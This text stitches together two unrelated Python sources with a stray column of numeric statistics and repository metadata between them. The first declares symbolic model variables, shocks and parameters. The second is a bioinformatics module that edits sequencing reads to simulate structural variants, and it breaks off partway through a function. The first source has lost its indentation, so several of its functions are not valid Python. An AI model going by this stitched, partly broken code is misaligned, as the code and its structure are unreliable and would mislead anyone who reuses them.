#def set_parameters(s,names_dict={}):
# """Create S symbolic variable with the name *s*.
# -- a string, either a single variable name, or
# a space separated list of variable names, or
# a list of variable names.
# NOTE: The new variable is both returned and automatically injected into
# the parent's *global* namespace. It's recommended not to use "var" in
# library code, it is better to use symbols() instead.
# EXAMPLES:
# """
#
# frame = inspect.currentframe().f_back
# try:
# if not isinstance(s, list):
# s = re.split('\s|,', s)
# res = []
# for t in s:
# # skip empty stringG
# if not t:
# continue
# if t in names_dict:
# latex_name = names_dict[t]
# else:
# latex_name = None
# sym = Parameter(t,latex_name)
# frame.f_globals[t] = sym
# res.append(sym)
# res = list(res)
# if len(res) == 0: # var('')
# res = []
# # otherwise var('a b ...')
# frame.f_globals['parameters'] = res
# return res
# finally:
# del frame
#
#def add_parameters(s,latex_names=None):
# """
# The same as set_variables but doesn't replace the existing variables.
# """
#
# frame = inspect.currentframe().f_back
# try:
# if not isinstance(s, list):
# s = re.split('\s|,', s)
# if latex_names <> None:
# sl = re.split('\s|,', latex_names)
# if len(sl)<> len(s):
# raise Exception, "You should supply one latex name per variable"
# res = []
# for i in range(len(s)):
# t=s[i]
# # skip empty stringG
# if not t:
# continue
# if latex_names == None:
# sym = Parameter(t)
# else:
# sym = Parameter(t,latex_name=sl[i])
# frame.f_globals[t] = sym
# res.append(sym)
# res = list(res)
# if len(res) == 0: # var('')
# res = []
# # otherwise var('a b ...')
# if frame.f_globals.get('parameters'):
# frame.f_globals['parameters'].extend(res)
# else:
# frame.f_globals['parameters'] = res
# return res
# finally:
# del frame
#### new style #######
def def_variables(s):
"""
    Declare symbolic Variables from a string or list of names and inject them into the caller's global namespace.
"""
frame = inspect.currentframe().f_back
try:
if isinstance(s,str):
            s = re.split(r'\s|,', s)
        res = []
        for t in s:
            # skip empty strings
if not t:
continue
if t.count("@") > 0:
sym = IndexedSymbol(t,Variable)
t = t.strip('@')
else:
sym = Variable(t)
frame.f_globals[t] = sym
res.append(sym)
if frame.f_globals.get('variables_order'):
# we should avoid to declare symbols twice !
frame.f_globals['variables_order'].extend(res)
else:
frame.f_globals['variables_order'] = res
return res
finally:
del frame
def def_shocks(s):
"""
    Declare symbolic Shocks from a string or list of names and inject them into the caller's global namespace.
"""
frame = inspect.currentframe().f_back
try:
if isinstance(s,str):
            s = re.split(r'\s|,', s)
        res = []
        for t in s:
            # skip empty strings
if not t:
continue
if t.count("@") > 0:
sym = IndexedSymbol(t,Shock)
t = t.strip('@')
else:
sym = Shock(t)
frame.f_globals[t] = sym
res.append(sym)
if frame.f_globals.get('shocks_order'):
# we should avoid to declare symbols twice !
frame.f_globals['shocks_order'].extend(res)
else:
frame.f_globals['shocks_order'] = res
return res
finally:
del frame
def def_parameters(s):
"""
    Declare symbolic Parameters from a string or list of names and inject them into the caller's global namespace.
"""
frame = inspect.currentframe().f_back
try:
if isinstance(s,str):
            s = re.split(r'\s|,', s)
        res = []
        for t in s:
            # skip empty strings
if not t:
continue
if t.count("@") > 0:
sym = IndexedSymbol(t,Parameter)
t = t.strip('@')
else:
sym = Parameter(t)
frame.f_globals[t] = sym
res.append(sym)
if frame.f_globals.get('parameters_order'):
# we should avoid to declare symbols twice !
frame.f_globals['parameters_order'].extend(res)
else:
frame.f_globals['parameters_order'] = res
return res
finally:
del frame
def clear_all():
"""
Clears all parameters, variables, and shocks defined previously
"""
frame = inspect.currentframe().f_back
try:
        if frame.f_globals.get('variables_order'):
            del frame.f_globals['variables_order']
        if frame.f_globals.get('shocks_order'):
            del frame.f_globals['shocks_order']
        if frame.f_globals.get('parameters_order'):
            del frame.f_globals['parameters_order']
finally:
del frame
def inject_symbols(symbs):
frame = inspect.currentframe().f_back
try:
for s in symbs:
sn = s.name
frame.f_globals[sn] = s
finally:
del frame
| 29.982558
| 81
| 0.496025
| 1,233
| 10,314
| 4.064071
| 0.101379
| 0.037118
| 0.080423
| 0.054879
| 0.908002
| 0.871084
| 0.848334
| 0.818799
| 0.798843
| 0.783676
| 0
| 0.002642
| 0.376091
| 10,314
| 343
| 82
| 30.069971
| 0.776068
| 0.679368
| 0
| 0.707865
| 0
| 0
| 0.069853
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05618
| false
| 0
| 0.033708
| 0
| 0.123596
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
507024300ad5db651ed84931b1bd16642f4463db
| 40,570
|
py
|
Python
|
varben/deal_sv/dealReadsType.py
|
yulijia/VarBen
|
a41491d6022822be8be3c5a0dd7e6e06987374cd
|
[
"MIT"
] | null | null | null |
varben/deal_sv/dealReadsType.py
|
yulijia/VarBen
|
a41491d6022822be8be3c5a0dd7e6e06987374cd
|
[
"MIT"
] | null | null | null |
varben/deal_sv/dealReadsType.py
|
yulijia/VarBen
|
a41491d6022822be8be3c5a0dd7e6e06987374cd
|
[
"MIT"
] | null | null | null |
import random
import re
import copy
from varben.common.methods import check_reads_pair, getComplementarySeq
try_max_time = 100
shift_num = 1000
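# try_max_time: maximum random attempts to find a compatible mate read before giving up.
# shift_num: maximum index distance allowed when re-pairing reads within deal_type4.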
def mend_read_part(ref, read, start, end, readsType, relPart, svtype="del",
                   subPos=None):  # relPart: the side that already matches the reference; "left" means the left part exists and the right part must be mended
seq_len = len(read.query_sequence)
    posPairList = read.get_aligned_pairs()  # list of (query_pos, ref_pos) tuples from pysam
svPosIndex = 0
if readsType == "type1" or readsType == "type6":
if relPart == "left":
for i, pair in enumerate(posPairList):
svPosIndex = pair[0]
if pair[1] >= start:
break
if svtype == "del":
pos_start = end + 1
pos_end = pos_start + seq_len - svPosIndex
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex] + mend_seq
elif svtype == "inv":
pos_end = end + 1
pos_start = pos_end - (seq_len - svPosIndex)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex] + getComplementarySeq(mend_seq)[::-1]
elif svtype == "trans_balance" or svtype == "trans_chrom":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_start = trans_start
pos_end = pos_start + (seq_len - svPosIndex)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex] + mend_seq
elif svtype == "trans_unbalance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_start = trans_start
pos_end = pos_start + seq_len - (svPosIndex + 1)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex + 1] + mend_seq
elif readsType == "type6" and svtype == "dup":
pos_end = end + 1
pos_start = pos_end - svPosIndex
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex:]
else:
for i, pair in enumerate(posPairList):
svPosIndex = pair[0]
if pair[1] >= end:
break
if svtype == "del":
pos_end = start - 1 + 1
pos_start = pos_end - (svPosIndex + 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex + 1:]
elif svtype == "inv":
pos_start = start
pos_end = start + (svPosIndex + 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = getComplementarySeq(mend_seq)[::-1] + read.query_sequence[svPosIndex + 1:]
elif svtype == "trans_balance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_end = trans_end + 1
pos_start = pos_end - (svPosIndex + 1)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex + 1:]
elif readsType == "type6" and svtype == "dup":
pos_start = start
pos_end = pos_start + seq_len - (svPosIndex + 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex + 1] + mend_seq
elif readsType == "type6" and svtype == "trans_unbalance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_end = end + 1
pos_start = pos_end - (svPosIndex + 1)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex + 1:]
elif readsType == "type2":
if relPart == "left":
for i, pair in enumerate(posPairList):
svPosIndex = pair[0]
if pair[1] >= start:
break
if svtype == "inv":
pos_start = end + 1
pos_end = pos_start + svPosIndex
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = getComplementarySeq(mend_seq)[::-1] + read.query_sequence[svPosIndex:]
elif svtype == "dup":
pos_end = end + 1
pos_start = pos_end - svPosIndex
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex:]
elif svtype == "trans_balance" or svtype == "trans_chrom":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_end = trans_start
pos_start = pos_end - svPosIndex
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex:]
elif relPart == "right":
for i, pair in enumerate(posPairList):
svPosIndex = pair[0]
if pair[1] >= end:
break
if svtype == "inv":
pos_end = start
pos_start = pos_end - (seq_len - svPosIndex - 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex + 1] + getComplementarySeq(mend_seq)[::-1]
# print read.query_name, read.query_sequence, mend_seq, new_seq
elif svtype == "dup":
pos_start = start
pos_end = pos_start + seq_len - (svPosIndex + 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[0:svPosIndex + 1] + mend_seq
elif svtype == "trans_balance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_start = trans_end + 1
pos_end = pos_start + seq_len - (svPosIndex + 1)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex + 1] + mend_seq
elif svtype == "trans_unbalance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_end = trans_end + 1
pos_start = pos_end - svPosIndex
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
# print trans_chr, pos_start, pos_end
new_seq = mend_seq + read.query_sequence[svPosIndex:]
elif readsType == "type5":
if relPart == "left":
for i, pair in enumerate(posPairList):
svPosIndex = pair[0]
if pair[1] >= start:
break
if svtype == "del":
pos_start = end + 1
pos_end = pos_start + seq_len - svPosIndex
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex] + mend_seq
elif svtype == "dup":
pos_end = end + 1
pos_start = pos_end - svPosIndex
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex:]
elif svtype == "trans_balance" or svtype == "trans_chrom":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_start = trans_start
pos_end = pos_start + (seq_len - svPosIndex)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex] + mend_seq
elif svtype == "trans_unbalance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_start = trans_start
pos_end = pos_start + seq_len - (svPosIndex + 1)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex + 1] + mend_seq
elif svtype == "inv":
pos_end = end + 1
pos_start = pos_end - (seq_len - svPosIndex)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[:svPosIndex] + getComplementarySeq(mend_seq)[::-1]
elif relPart == "right":
for i, pair in enumerate(posPairList):
svPosIndex = pair[0]
if pair[1] >= end:
break
if svtype == "dup":
pos_start = start
pos_end = pos_start + seq_len - (svPosIndex + 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = read.query_sequence[0:svPosIndex + 1] + mend_seq
elif svtype == "trans_balance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_end = trans_end + 1
pos_start = pos_end - (svPosIndex + 1)
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex + 1:]
elif svtype == "trans_unbalance":
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
pos_end = trans_end + 1
pos_start = pos_end - svPosIndex
mend_seq = ref.fetch(trans_chr, pos_start, pos_end)
new_seq = mend_seq + read.query_sequence[svPosIndex:]
elif svtype == "inv":
pos_start = start
pos_end = start + (svPosIndex + 1)
mend_seq = ref.fetch(read.reference_name, pos_start, pos_end)
new_seq = getComplementarySeq(mend_seq)[::-1] + read.query_sequence[svPosIndex + 1:]
# if len(new_seq) != seq_len:
# print readsType, relPart, svtype
return new_seq
def deal_type1(ref, reads_type1_left, reads_type1_right, freq, start, end, svtype, subPos=None):
# fix up
print "deal type1 start......"
reads_left_num = len(reads_type1_left)
reads_right_num = len(reads_type1_right)
reads_left_mend_id = random_mendIDList(reads_left_num, freq)
reads_right_mend_id = random_mendIDList(reads_right_num, freq)
total_reads = []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type1_left[read_pair_id]
read = read_pair[1]
read_mate = read_pair[0]
new_seq = mend_read_part(ref, read, start, end, "type1", "left", svtype, subPos)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
total_reads.append([read_mate, read])
for read_pair_id in reads_right_mend_id:
read_pair = reads_type1_right[read_pair_id]
read = read_pair[0]
read_mate = read_pair[1]
new_seq = mend_read_part(ref, read, start, end, "type1", "right", svtype, subPos)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
total_reads.append([read, read_mate])
print "deal type1 end......"
return total_reads
def deal_type2(ref, reads_type2_left, reads_type2_right, freq, start, end, svtype, subPos=None):
print "deal type2 start......"
reads_left_num = len(reads_type2_left)
reads_right_num = len(reads_type2_right)
reads_left_mend_id = random_mendIDList(reads_left_num, freq)
reads_right_mend_id = random_mendIDList(reads_right_num, freq)
total_reads = []
if svtype == "del":
for read_pair_id in reads_left_mend_id:
total_reads.append(reads_type2_left[read_pair_id])
for read_pair_id in reads_right_mend_id:
total_reads.append(reads_type2_right[read_pair_id])
elif svtype == "inv":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type2_left[read_pair_id]
read = read_pair[0]
read_mate = read_pair[1]
new_seq = mend_read_part(ref, read, start, end, "type2", "left", svtype)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
total_reads.append([read, read_mate])
for read_pair_id in reads_right_mend_id:
read_pair = reads_type2_right[read_pair_id]
read = read_pair[1]
read_mate = read_pair[0]
new_seq = mend_read_part(ref, read, start, end, "type2", "right", svtype)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
total_reads.append([read_mate, read])
elif svtype == "dup":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type2_left[read_pair_id]
read = read_pair[0]
new_seq = mend_read_part(ref, read, start, end, "type2", "left", svtype)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
read2 = read_pair[1]
total_reads.append([read, read2])
for read_pair_id in reads_right_mend_id:
read_pair = reads_type2_right[read_pair_id]
read2 = read_pair[1]
new_seq = mend_read_part(ref, read2, start, end, "type2", "right", svtype)
qual = read2.query_qualities
read2.query_sequence = new_seq
read2.query_qualities = qual
read = read_pair[0]
total_reads.append([read, read2])
elif svtype == "trans_unbalance":
for read_pair_id in reads_right_mend_id:
read_pair = reads_type2_right[read_pair_id]
read = read_pair[0]
new_seq = mend_read_part(ref, read, start, end, "type2", "right", svtype, subPos=subPos)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
read2 = read_pair[1]
total_reads.append([read, read2])
elif svtype == "trans_balance":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type2_left[read_pair_id]
read = read_pair[0]
new_seq = mend_read_part(ref, read, start, end, "type2", "left", svtype, subPos=subPos)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
read2 = read_pair[1]
total_reads.append([read, read2])
for read_pair_id in reads_right_mend_id:
read_pair = reads_type2_right[read_pair_id]
read2 = read_pair[1]
new_seq = mend_read_part(ref, read2, start, end, "type2", "right", svtype, subPos=subPos)
qual = read2.query_qualities
read2.query_sequence = new_seq
read2.query_qualities = qual
read = read_pair[0]
total_reads.append([read, read2])
elif svtype == "trans_chrom":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type2_left[read_pair_id]
read = read_pair[0]
new_seq = mend_read_part(ref, read, start, end, "type2", "left", svtype, subPos=subPos)
qual = read.query_qualities
read.query_sequence = new_seq
read.query_qualities = qual
read2 = read_pair[1]
total_reads.append([read, read2])
print "deal type2 end......"
return total_reads
def deal_type3(reads_type3_left, reads_type3_right, freq, insertSize, start, end, svtype, supple1=None, supple2=None,
subPos=None):
# choose left read of start and right of end
print "deal type3 start......"
reads_left_num = len(reads_type3_left)
reads_right_num = len(reads_type3_right)
print reads_left_num, reads_right_num
reads_left_mend_id = random_mendIDList(reads_left_num, freq)
reads_right_mend_id = random_mendIDList(reads_right_num, freq)
total_del_reads = []
total_add_reads = []
total_modify_reads = []
if svtype == "del":
if len(supple1) == 0:
print "Step3: Warning! No corresponding reads to pair"
return [], [], []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type3_left[read_pair_id]
read = read_pair[0]
try_time = 0
while True:
read_pair_tmp = random.sample(supple1, 1)[0]
read_right = read_pair_tmp[1]
insertSize_tmp = read_right.reference_end - read.reference_start - (end - start + 1)
# print insertSize, insertSize_tmp
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read, read_right):
new_read = read_right
total_modify_reads.append([read, new_read])
total_del_reads.append([read_pair_tmp[0], read_pair[1]])
x = "\t".join(
[read.reference_name, str(read.reference_start), str(read.reference_end), str(read.is_read1)])
y = "\t".join([new_read.reference_name, str(new_read.reference_start), str(new_read.reference_end),
str(new_read.is_read1)])
print(x + "; " + y)
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
if svtype == "dup":
if len(supple1) == 0:
print "Step3: Warning! No corresponding reads to pair"
return [], [], []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type3_left[read_pair_id]
read = read_pair[1]
try_time = 0
while True:
read_left = random.sample(supple1, 1)[0][0]
insertSize_tmp = end - read_left.reference_start + read.reference_end - start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read_left, read):
new_read = read_left
total_add_reads.append([read, new_read])
# x = "\t".join(
# [read.reference_name, str(read.reference_start), str(read.reference_end), str(read.is_read1)])
# y = "\t".join([new_read.reference_name, str(new_read.reference_start), str(new_read.reference_end),
# str(new_read.is_read1)])
# print(x + "; " + y)
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
elif svtype == "inv":
#if len(reads_type4) == 0:
# print "Step3: Warning! No corresponding reads to pair"
# return [], [], []
# print 'inv', len(reads_left_mend_id)
if len(reads_type3_left) == 0 or len(reads_type3_right) == 0:
print "Step3: Warning! No corresponding reads to pair"
return [], [], []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type3_left[read_pair_id]
read = read_pair[0]
try_time = 0
while True:
read_pair_tmp = copy.deepcopy(random.sample(reads_type3_right, 1)[0])
read_left = read_pair_tmp[0]
insertSize_tmp = start - read.reference_start + end - read_left.reference_start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read,
read_left): ### reverse information?!!!
new_read = read_left
qual = new_read.query_qualities
new_read.query_sequence = getComplementarySeq(new_read.query_sequence)[::-1]
new_read.query_qualities = qual[::-1]
total_modify_reads.append([read, new_read])
init_right = read_pair[1]
qual2 = init_right.query_qualities
init_right.query_sequence = getComplementarySeq(init_right.query_sequence)[::-1]
init_right.query_qualities = qual2[::-1]
total_modify_reads.append([init_right, read_pair_tmp[1]])
x = "\t".join(
[read.reference_name, str(read.reference_start), str(read.reference_end), str(read.is_read1)])
y = "\t".join([new_read.reference_name, str(new_read.reference_start), str(new_read.reference_end),
str(new_read.is_read1)])
print(x + "; " + y)
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
for read_pair_id in reads_right_mend_id:
read_pair = reads_type3_right[read_pair_id]
read = read_pair[1]
try_time = 0
while True:
read_pair_tmp = copy.deepcopy(random.sample(reads_type3_left, 1)[0])
read_right = read_pair_tmp[1]
insertSize_tmp = read_right.reference_end - start + read.reference_end - end + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read_right, read):
new_read = read_right
qual = new_read.query_qualities
new_read.query_sequence = getComplementarySeq(new_read.query_sequence)[::-1]
new_read.query_qualities = qual[::-1]
total_modify_reads.append([new_read, read])
init_left = read_pair[0]
qual2 = init_left.query_qualities
init_left.query_sequence = getComplementarySeq(init_left.query_sequence)[::-1]
init_left.query_qualities = qual2[::-1]
total_modify_reads.append([read_pair_tmp[0], init_left])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
elif svtype == "trans_balance":
reads_left_sub, reads_right_sub = supple1, supple2
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
if len(reads_left_sub) == 0 or len(reads_right_sub) == 0:
print "Step3: Warning! No corresponding reads to pair"
return [], [], []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type3_left[read_pair_id]
read = read_pair[0]
try_time = 0
while True:
read_pair_tmp = random.sample(reads_left_sub, 1)[0]
read_right = read_pair_tmp[1]
insertSize_tmp = start - read.reference_start + read_right.reference_end - trans_start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read, read_right):
new_read = read_right
total_modify_reads.append([read, new_read])
total_modify_reads.append([read_pair_tmp[0], read_pair[1]])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
for read_pair_id in reads_right_mend_id:
read_pair = reads_type3_right[read_pair_id]
read = read_pair[1]
try_time = 0
while True:
read_pair_tmp = random.sample(reads_right_sub, 1)[0]
read_left = read_pair_tmp[0]
insertSize_tmp = trans_end - read_left.reference_start + read.reference_end - end + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read_left, read):
new_read = read_left
total_modify_reads.append([new_read, read])
total_modify_reads.append([read_pair[0], read_pair_tmp[1]])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
elif svtype == "trans_chrom":
reads_left_sub, reads_right_sub = supple1, supple2
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
if len(reads_left_sub) == 0:
print "Step3: Warning! No corresponding reads to pair"
return [], [], []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type3_left[read_pair_id]
read = read_pair[0]
try_time = 0
while True:
read_pair_tmp = random.sample(reads_left_sub, 1)[0]
read_right = read_pair_tmp[1]
insertSize_tmp = start - read.reference_start + read_right.reference_end - trans_start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read, read_right):
new_read = read_right
total_modify_reads.append([read, new_read])
total_modify_reads.append([read_pair_tmp[0], read_pair[1]])
x = "\t".join(
[read.reference_name, str(read.reference_start), str(read.reference_end), str(read.is_read1)])
y = "\t".join([new_read.reference_name, str(new_read.reference_start), str(new_read.reference_end),
str(new_read.is_read1)])
print(x + "; " + y)
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
elif svtype == "trans_unbalance":
reads_left_sub, reads_right_sub = supple1, supple2
res = re.match("(\w*):(\d*)-(\d*)", subPos)
trans_chr, trans_start, trans_end = res.group(1), int(res.group(2)), int(res.group(3))
if len(reads_left_sub) == 0 or len(reads_right_sub) == 0:
print "Step3: Warning! No corresponding reads to pair"
return [], [], []
for read_pair_id in reads_left_mend_id:
read_pair = reads_type3_left[read_pair_id]
read = read_pair[0]
try_time = 0
while True:
read_pair_tmp = random.sample(reads_left_sub, 1)[0]
read_right = read_pair_tmp[1]
insertSize_tmp = start - read.reference_start + read_right.reference_end - trans_start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read,
read_right): # reverse information?!!!
new_read = read_right
total_modify_reads.append([read, new_read])
total_modify_reads.append([read_pair_tmp[0], read_pair[1]])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
for read_pair_id in reads_right_mend_id: # use left again, because right is none
read_pair = reads_type3_right[read_pair_id]
read = read_pair[1]
try_time = 0
while True:
read_pair_tmp = random.sample(reads_right_sub, 1)[0]
read_left = read_pair_tmp[0]
insertSize_tmp = trans_end - read_left.reference_start + read.reference_end - end + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read_left, read):
new_read = read_left
total_modify_reads.append([new_read, read])
total_modify_reads.append([read_pair[0], read_pair_tmp[1]])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
print "deal type3 end......"
return total_modify_reads, total_add_reads, total_del_reads
def deal_type4(reads_type4, freq, svtype, insertSize=None, cnvType=None):
print "deal type4 start......"
reads_num = len(reads_type4)
reads_mend_id = random_mendIDList(reads_num, freq)
total_reads = []
if svtype == "del" or (svtype == "cnv" and cnvType == "loss"):
for read_pair_id in reads_mend_id:
total_reads.append(reads_type4[read_pair_id])
elif svtype == "inv":
total_reads = []
elif svtype == "trans_balance":
total_reads = []
elif svtype == "dup" or (svtype == "cnv" and cnvType == "gain") or svtype == "trans_unbalance":
reads_mend_left_id = random_mendIDList(reads_num / 2, freq)
print "left mend count", len(reads_mend_left_id)
for read_pair_id in reads_mend_left_id:
# print read_pair_id
read_pair = reads_type4[read_pair_id]
read = read_pair[0]
# print read.reference_start
try_time = 0
while True:
read_right_pair_id = random.randint(read_pair_id + 1, min(read_pair_id + shift_num, reads_num - 1))
read_right = reads_type4[read_right_pair_id][1]
if read_right.query_name == read.query_name:
continue
insertSize_tmp = read_right.reference_end - read.reference_start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read, read_right):
new_read = read_right
total_reads.append([read, new_read])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
# print "out loop1"
reads_mend_right_id = [reads_num / 2 + i for i in random_mendIDList(reads_num - reads_num / 2, freq)]
print "right mend count", len(reads_mend_right_id)
for read_pair_id in reads_mend_right_id:
# print read_pair_id
read_pair = reads_type4[read_pair_id]
read = read_pair[1]
try_time = 0
while True:
read_left_pair_id = random.randint(max(read_pair_id - shift_num, 0), read_pair_id - 1)
read_left = reads_type4[read_left_pair_id][0]
if read_left.query_name == read.query_name:
continue
insertSize_tmp = read.reference_end - read_left.reference_start + 1
if insertSize[0] <= insertSize_tmp <= insertSize[1] and check_reads_pair(read_left, read):
new_read = read_left
total_reads.append([new_read, read])
break
try_time += 1
if try_time > try_max_time:
print "can't find a mate read to match!"
break
print "deal type4 end......"
return total_reads
def deal_type5(ref, reads_type5_left, reads_type5_right, freq, start, end, svtype, supple1=None, supple2=None,
subPos=None):
print "deal type5 start......"
reads_left_num = len(reads_type5_left)
reads_right_num = len(reads_type5_right)
reads_left_mend_id = random_mendIDList(reads_left_num, freq)
reads_right_mend_id = random_mendIDList(reads_right_num, freq)
total_reads = []
if svtype == "del":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type5_left[read_pair_id]
read_left = read_pair[0]
read_right = read_pair[1]
new_seq_left = mend_read_part(ref, read_left, start, end, "type5", "left", svtype)
new_seq_right = mend_read_part(ref, read_right, start, end, "type5", "left", svtype)
qual_left = read_left.query_qualities
qual_right = read_right.query_qualities
read_left.query_sequence = new_seq_left
read_right.query_sequence = new_seq_right
read_left.query_qualities = qual_left
read_right.query_qualities = qual_right
total_reads.append([read_left, read_right])
elif svtype == "dup" or svtype == "trans_balance" or svtype == "inv" or svtype == "trans_unbalance":
for read_pair_id in reads_left_mend_id:
read_pair = reads_type5_left[read_pair_id]
read_left = copy.deepcopy(read_pair[0])
read_right = copy.deepcopy(read_pair[1])
new_seq_left = mend_read_part(ref, read_left, start, end, "type5", "left", svtype, subPos=subPos)
new_seq_right = mend_read_part(ref, read_right, start, end, "type5", "left", svtype, subPos=subPos)
qual_left = read_left.query_qualities
qual_right = read_right.query_qualities
read_left.query_sequence = new_seq_left
read_right.query_sequence = new_seq_right
read_left.query_qualities = qual_left
read_right.query_qualities = qual_right
total_reads.append([read_left, read_right])
for read_pair_id in reads_right_mend_id:
read_pair = reads_type5_right[read_pair_id]
read_left = copy.deepcopy(read_pair[0])
read_right = copy.deepcopy(read_pair[1])
new_seq_left = mend_read_part(ref, read_left, start, end, "type5", "right", svtype, subPos=subPos)
new_seq_right = mend_read_part(ref, read_right, start, end, "type5", "right", svtype, subPos=subPos)
qual_left = read_left.query_qualities
